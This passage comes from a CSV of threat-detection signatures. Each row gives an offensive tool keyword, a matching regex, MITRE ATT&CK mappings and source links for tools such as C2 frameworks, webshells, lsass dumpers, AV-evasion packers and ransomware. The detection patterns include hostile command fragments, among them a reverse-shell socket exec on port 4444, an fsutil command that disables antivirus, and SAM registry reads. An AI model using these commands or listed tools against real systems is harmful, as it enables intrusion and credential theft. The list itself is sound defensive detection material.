TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*from Exrop import *",".{0,1000}from\sExrop\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from gtfonow.*",".{0,1000}from\sgtfonow\..{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*from helpers.*_smbserver * import SimpleSMBServer*",".{0,1000}from\shelpers\..{0,1000}_smbserver\s.{0,1000}\simport\sSimpleSMBServer.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*from hiphp import *",".{0,1000}from\shiphp\simport\s.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*from holehe.core import*",".{0,1000}from\sholehe\.core\simport.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*from https://github.com/S3cur3Th1sSh1t/Nim_Dinvoke*",".{0,1000}from\shttps\:\/\/github\.com\/S3cur3Th1sSh1t\/Nim_Dinvoke.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*from https://www.stevencampbell.info/Nim-Convert-Shellcode-to-UUID*",".{0,1000}from\shttps\:\/\/www\.stevencampbell\.info\/Nim\-Convert\-Shellcode\-to\-UUID.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*from lib.config import *C2_COMMANDS*",".{0,1000}from\slib\.config\simport\s.{0,1000}C2_COMMANDS.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*from Maitm.Maitm *",".{0,1000}from\sMaitm\.Maitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*from merlin import *",".{0,1000}from\smerlin\simport\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*from networking.dhcp_dns_update_utils*",".{0,1000}from\snetworking\.dhcp_dns_update_utils.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*from pwn import *",".{0,1000}from\spwn\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from pysnaffler.rules.constants import *",".{0,1000}from\spysnaffler\.rules\.constants\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.rules.rule import SnaffleRule*",".{0,1000}from\spysnaffler\.rules\.rule\simport\sSnaffleRule.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.ruleset import SnafflerRuleSet*",".{0,1000}from\spysnaffler\.ruleset\simport\sSnafflerRuleSet.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.scanner import SnafflerScanner*",".{0,1000}from\spysnaffler\.scanner\simport\sSnafflerScanner.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.snaffler import *",".{0,1000}from\spysnaffler\.snaffler\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from rarce import exploit*",".{0,1000}from\srarce\simport\sexploit.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*from shellcodes import *",".{0,1000}from\sshellcodes\simport\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*from spoofer_config import SpooferConfig*",".{0,1000}from\sspoofer_config\simport\sSpooferConfig.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*from tor2web import*",".{0,1000}from\stor2web\simport.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*from wapitiCore.*",".{0,1000}from\swapitiCore\..{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*frpc.exe -c frpc.in*",".{0,1000}frpc\.exe\s\-c\sfrpc\.in.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fscan.exe -*",".{0,1000}fscan\.exe\s\-.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*fsockopen(*0.0.0.0*4444*exec(*",".{0,1000}fsockopen\(.{0,1000}0\.0\.0\.0.{0,1000}4444.{0,1000}exec\(.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*fsutil devdrv enable /disallowAv*",".{0,1000}fsutil\sdevdrv\senable\s\/disallowAv.{0,1000}","offensive_tool_keyword","fsutil","Disables antivirus filtering on the developer drive","T1112 - T1562.001 - T1222.001 - T1480","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/0gtweet/status/1720532496847167784","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*FtpC2.exe*",".{0,1000}FtpC2\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*FtpC2.Tasks*",".{0,1000}FtpC2\.Tasks.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*ftshell -*",".{0,1000}ftshell\s\-.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*ftshell.v3*",".{0,1000}ftshell\.v3.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Fuck-Etw-main*",".{0,1000}Fuck\-Etw\-main.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*fucksetuptools*",".{0,1000}fucksetuptools.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*FuckThatPacker.*",".{0,1000}FuckThatPacker\..{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*fuckyoufuckyoufuckyoufuckyoufuckyou*",".{0,1000}fuckyoufuckyoufuckyoufuckyoufuckyou.{0,1000}","offensive_tool_keyword","VoidCrypt","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*FudgeC2.*",".{0,1000}FudgeC2\..{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*FudgeC2Viewer.py*",".{0,1000}FudgeC2Viewer\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*fuegoShell-bind>*",".{0,1000}fuegoShell\-bind\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Fuegoshell-client started*",".{0,1000}Fuegoshell\-client\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*fuegoShell-reverse>*",".{0,1000}fuegoShell\-reverse\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Fuegoshell-server started*",".{0,1000}Fuegoshell\-server\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*fuff *-input-shell*",".{0,1000}fuff\s.{0,1000}\-input\-shell.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fuff *-scraperfile*",".{0,1000}fuff\s.{0,1000}\-scraperfile.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*fuff *-scrapers*",".{0,1000}fuff\s.{0,1000}\-scrapers.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*FULLSHADE/WindowsExploitationResources*",".{0,1000}FULLSHADE\/WindowsExploitationResources.{0,1000}","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1453","310","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" "*FullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn*",".{0,1000}FullyQualifiedAssemblyName\=0\;\\\\r\\\\nClrInstanceID\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*func decryptMalware(*",".{0,1000}func\sdecryptMalware\(.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*func_get_powershell_dll*",".{0,1000}func_get_powershell_dll.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*func_install_wine_dotnettojscript*",".{0,1000}func_install_wine_dotnettojscript.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*function Base64_Obfuscation*",".{0,1000}function\sBase64_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*function BXOR_Obfuscation*",".{0,1000}function\sBXOR_Obfuscation.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","0","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*function DumpSAM*",".{0,1000}function\sDumpSAM.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function GNLPH*Get-ItemProperty ""HKLM:SAM\SAM\Domains\Account\Users\*",".{0,1000}function\sGNLPH.{0,1000}Get\-ItemProperty\s\""HKLM\:SAM\\SAM\\Domains\\Account\\Users\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function ImpersonateFromParentPid*",".{0,1000}function\sImpersonateFromParentPid.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*function psenum*",".{0,1000}function\spsenum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Function PsMapExec*",".{0,1000}Function\sPsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*function Use-Zeus*",".{0,1000}function\sUse\-Zeus.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*FunnyWolf/pystinger*",".{0,1000}FunnyWolf\/pystinger.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 